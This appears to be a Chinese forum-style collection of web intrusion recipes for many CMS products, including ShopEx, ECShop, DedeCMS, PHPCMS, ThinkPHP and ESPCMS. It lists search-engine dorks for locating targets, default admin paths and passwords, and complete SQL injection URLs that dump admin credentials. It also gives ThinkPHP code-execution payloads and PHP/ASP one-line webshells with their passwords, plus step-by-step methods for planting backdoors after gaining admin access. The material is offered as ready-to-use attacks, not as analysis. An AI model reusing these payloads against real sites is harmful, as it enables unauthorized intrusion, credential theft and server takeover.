后台-订单管理-订单打印-选择源代码编辑-保存-返回订单列表，随意选择一个订单打印，返回OK，生成一句话成功-在根目录生成了一个null.php，一句话密码：usb
==========================================================================================================================

【 教育站sql注入通杀0day 】

关键词：inurl:info_Print.asp?ArticleID=
默认后台：www.xx.com/ad_login.asp
好比：http://www.xx.com/info_Print.asp?ArticleID=539
加上：union select 1,2,username,password,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 from admin
这样就直接获得了管理员帐户和通过Md5加密的密码了。
==========================================================================================================================

【 IIS7.0 畸形解析漏洞通杀oday 】

找到某个使用IIS7.0架设的站，而后找到其中的图片上传点（不须要管理权限，普通注册用户便可搞定），把PHP一句话图片木马缀改为.jpg，传上去，获得图片地址。
在图片格式后面添加xx.php xx随便你怎么填，只要后缀为.php就好，以后菜刀链接便可！
==========================================================================================================================

【 Yothcms 遍历目录漏洞 】

优斯科技企业网站管理系统(YothCMS)是一款彻底开源免费的CMS。
默认后台：admin/login.asp
遍历目录：ewebeditor/manage/upload.asp?id=1&dir=../
数据库路径：%23da%23ta%23%23db_%23data%23%23.asa
==========================================================================================================================

【 传信网络独立开发网站源码0day漏洞 】

默认后台：system/login.asp
编辑器后台路径：ubbcode/admin_login.asp
数据库路径：ubbcode/db/ewebeditor.mdb
默认帐号密码：yzm 111111
==========================================================================================================================
【

科讯cms 6.5后台拿shell 】

1.能够在数据库备份中找到网站的绝对路径
2.利用科讯SQL注入漏洞利用工具也能找到进入后台后执行sql命令：
create table E:wenxiushiwz001KS_DataCollectKS_Collect.Mdb.cmd (a varchar(50))
insert into E:wenxiushiwz001KS_DataCollectKS_Collect.Mdb.cmd (a) values (‘┼攠數畣整爠煥敵瑳∨∣┩愾’)
接着数据库备份成1.asp 菜刀链接密码：#
==========================================================================================================================

【 动易2006后台拿shell 】

进入后台后，咱们在左边菜单栏中选择“系统设置”，而后在出现的菜单栏里选择“自定义页面管理”，
接着须要先添加一个自定义页面分类，选择“添加自定义分类”这个选项，分类名称与分类简介均可以随便填写。填写完毕后选择“添加”，系统提示添加成功。
下面再来选择“添加自定义页面”，“页面名称”随便输入，“所属分类”就是刚才创建的分类就能够了。“页面类型”和“页面路径”都不用管，保持默认.
不过若是没有改页面路径的话，默认生成的文件是在根目录下的，也就是http://www.xx.com/maer.asp.“文件名称”即输入生成的木马的文件名。
“页面简介”也不用管，下面就是页面内容了。这里填入小马的代码。一切完毕点击“添加”会提示保存自定义页面成功。最后一步是要生成咱们的木马页面。
选择“自定义页面管理首页”，点击右边出现的“生成本页”就OK 了，成功得到动易的shell。
==========================================================================================================================

【 Shopex4.8.5 注入漏洞后台拿shell 】

关键词：powered by shopex v4.8.5
exp:Shopex 4.8.5 SQL Injection Exp

Shopex 4.8.5 SQL Injection Exp (product-gnotify)

fuck

 

保存为html格式，替换代码中的网站，本地打开后点击小图标，出现新页面，账号密码爆出来了，默认后台：shopadmin
拿shell方法….

第一步 页面管理 修改模版 而后选一个XML编辑
开始用 live http 抓包 大家懂的 而后把第一个POST包给抓出来

而后改包 id=1273923028-info.xml&tmpid=1273923028&name=index_temp.php&file_source=
解释一下 id是你选择的模版文件夹名称 后面的info.xml 是你修改的XML文件 tmpid= 大家懂的 就是模版文件夹 而后 name 是你提交的文件名字 file_source 是后门或者shel
我这里是一句话 大家懂的 而后提交了以后 地址是这样的http://Madman.in/themes/文件名称/你的木马名称
—————————————————————————————————————————————————————-

【 ecshop漏洞总汇 】

关键字：powered by ecshop普通代码：user.php?act=order_query&order_sn=’ union select 1，2，3，4，5，6，concat(user_name，0x7c，password，0x7c，email)，8 from ecs_admin_user/*
变种代码：search.php?encode=YToxOntzOjQ6ImF0dHIiO2E6MTp7czoxMjU6IjEnKSBhbmQgMT0yIEdST1VQIEJZIGdvb2RzX2lkIHVuaW9uIGFsbCBzZWxlY3QgY29uY2F0KHVzZXJfbmFtZSwweDNhLHBhc3N3b3JkLCciXCcpIHVuaW9uIHNlbGVjdCAxIyInKSwxIGZyb20gZWNzX2FkbWluX3VzZXIjIjtzOjE6IjEiO319
直接在网站后台加入代码回车就能爆出账号密码，再去掉代码加上/admin回车就能直接进后台了。拿shell方法很简单，找到“库项目管理”再选择“配送的方式”，在代码最下面插入php一句话木马： 不行就换php木马的预代码！
接着保存，一句话路径是：http://www.xxx.org/myship.php ; 打开“ASP+PHP两用Shell.html”填入地址，点击一下环境变量，成功以后点击上传文件就能够拿shell了。
—————————————————————————————————————————————————————-

【 帝国cms 6.6最新版本 】

自定义页面-增长自定义页面-随便写个.php文件名，内容写：
若是内容直接添一句话或者php大马是无用的，由于他会生成xxx.php前先给你执行，
PD9waHAgQGV2YWwoJF9QT1NUWydjbWQnXSk7Pz4= 就是 的base64加密。
因此生成xxx.php后 会出现内容 在文件里，而后用菜刀直接链接吧。
—————————————————————————————————————————————————————-

【 phpweb 】

关键字：inurl:down/class/index.php?myord=
后台地址：admin.php
万能密码：admin ‘or ‘1’=’1
注入地址：down/class/index.php?myord=1
表段：pwn_base_admin
拿shell通杀漏洞：登入后台–文章–文章发布–文章内容里的图片上传按钮–抓包以后改包NC提交。
也能够用下面的exp拿shell：
用火狐浏览器登陆后台，由于火狐浏览器有保留cookies的功能， 找到“phpweb之exp”这个html，拉进火狐浏览器器里上传1.php;.jpg的一句话木马，查看源码菜刀链接！
—————————————————————————————————————————————————————-

动科(dkcms)漏洞:

官方网站：www.dkcms.com主要是差很少3个版本为主吧，
V2.0 data/dkcm_ssdfhwejkfs.mdb
V3.1 _data/___dkcms_30_free.mdb
V4.2 _data/I^(()UU()H.mdb
默认后台：admin
编辑器：admin/fckeditor
后台拿shell，fck编辑器突破可拿shell
创建asp文件夹
Fck的路径：Admin/FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=/mk.asp&NewFolderName=mk.asp
—————————————————————————————————————————————————————-

ESPCMS通杀0day :

关键字：inurl:index.php?ac=article&at=read&did=
默认后台：adminsoft/index.php siteadmin/index.php
注入点(爆表前缀)：index.php?ac=search&at=taglist&tagkey=%2527,tags) or(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,table_name,0x27,0x7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)%23
爆账号：index.php?ac=search&at=taglist&tagkey=%2527,tags) or(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,username,0x27,0x7e)) from 前缀_admin_member limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)%23
爆密码：index.php?ac=search&at=taglist&tagkey=%2527,tags) or(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,password,0x27,0x7e)) from 前缀_admin_member limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)%23
账号和密码一次性爆：index.php?ac=search&at=taglist&tagkey=%2527,tags) or(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,username,0x27,password)) from 前缀_admin_member limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)%23
进到后台后，直接点击分类图片-修改-选择文件-直接上传php一句话木马
PS：当上传不了php木马时，去系统设置一下，添加图片上传格式 |php ，这样就能够上传一个图片文件头的php木马。
—————————————————————————————————————————————————————-

Thinkphp框架任意代码执行漏洞 :

ThinkPHP是一款国内使用比较普遍的老牌PHP MVC框架
关键字：thinkphp intitle:系统发生错误
获取Thinkphp的版本号：index.php/module/action/param1/$%7B@print(THINK_VERSION)%7D
获取服务器的配置信息：index.php/module/aciton/param1/${@phpinfo()}
列出网站全部文件列表：index.php/module/action/param1/{${system($_GET[‘x’])}}?x=ls -al
直接在网页执行一句话：index.php/module/action/param1/{${eval($_POST展开)}}
菜刀链接：http://www.xxx.com/index.php/module/action/param1/{${eval($_POST展开)}} 密码：s
—————————————————————————————————————————————————————-

良精系统 :

( 爆管理员账号密码的代码 )
NewsType.asp?SmallClass=’%20union%20select%200,username%2BCHR(124)%2Bpassword,2,3,4,5,6,7,8,9%20from%20admin%20union%20select%20*%20from%20news%20where%201=2%20and%20”=’
（ 一句话木马的妙用 ）
插入一句话木马后，链接网站的配置文件：inc/config.asp 密码都是g
1.网站配置-容许的上传文件类型-插入闭合的一句话木马：”%><%eval request(“g”)%><%s=” 不行就增长一个cer格式，以后上传cer格式的木马便可 2.网站配置-网站地址-插入闭合的一句话木马：http://”%><%execute(request(“g”))%><%’ 3.网站配置-网站名称-插入闭合的一句话木马：沧州临港彩越化工有限公司”%><%eval request(“g”)%><%s=” 4.网站配置-版权信息-插入闭合的一句话木马：”%><%eval(request(chr(103)))%><%’
（ 利用upfile_other.asp漏洞拿shell ）
直接访问会员中心：userreg.asp
注册一个用户并在未退出登陆的状态下，使用双文件上传工具足以爆它菊花，如下代码保存为1.html，并里面的修改目标站，第一个上传jpg，第二个上传cer

另外能够利用会员中心的cookies，用火狐浏览器登录以后，访问upfile_other.asp页面，用抓包工具去抓包，接着用明小子上传拿shell.

 

（ 上传漏洞 ）
漏洞文件：Upfile_Photo.asp
前提是进入后台了，访问这个文件，将提示“请先选择你要上传的文件！”，用抓包工具抓管理员的cookies，再把上传地址跟cookies扔到名小子里上传拿shell

（ 南方在线编辑器 ）

默认后台：admin/Southidceditor/admin_style.asp
数据库路径：admin/SouthidcEditorDatasSouthidcEditor.mdb
遍历目录：admin/Southidceditor/admin_uploadfile.asp?id=14&dir=../..
文件上传页面：admin/Southidceditor/ewebeditor.asp?id=57&style=southidc
样式设置页面：admin/SouthidcEditor/Admin_Style.asp?action=styleset&id=47
—————————————————————————————————————————————————————-

dedecms注入漏洞及找后台技巧 :

访问这个：plus/search.php?keyword=as&typeArr[ uNion ]=a
看结果若是提示：Safe Alert: Request Error step 1 !那么直接用下面的exp爆出全部管理员的账号密码：
plus/search.php?keyword=as&typeArr[111%3D@')+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+CONCAT(0x7c,userid,0x7c,pwd)+from+%23@__admin+limit+0,1),1,62)))a+from+information_schema.tables+group+by+a)b)%23@'+]=a
看结果若是提示：Safe Alert: Request Error step 2 !
那么直接用下面的exp爆出全部管理员的账号密码
plus/search.php?keyword=as&typeArr[111%3D@')+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+%23@__admin%23@'+]=a
有些/plus/目录换成了/plugins/目录，这时就要把/plus/换成/plugins/进行注射了
破解出md5为20位结果，只须要把前三位和后一位去掉，剩余16位拿去解密便可
如何找后台？
默认后台：dede
第一种方法：data/mysql_error_trace.inc （有时能够爆出路径）
第二种方法：把域名做为后台去尝试
第三种方法：查看这个文件：robots.txt
第四种方法：ping下域名得到ip以后，http://www.bing.com/ 搜索：ip:127.0.0.1 php （可能得到后台也能够得到其余旁注站，通常dede的旁站不少也是dedecms的）
—————————————————————————————————————————————————————-

 

PHPcms V9 爆数据库信息漏洞:直接爆出数据库链接信息：/index.php?m=search&c=index&a=public_get_suggest_keyword&url=asdf&q=../../phpsso_server/caches/configs/database.php关于后台拿webshell：进入后台后点击界面–模版风格–随便找个页面点击修改，插入咱们的一句话代码 @fwrite($fp, ‘<‘.’?php’.”rnrn”.’eval($_POST[0day])’.”rnrn?”.”>rn”);点击保存，接着点击可视化，代码就成功执行了，接着菜刀链接/0day.php，密码0day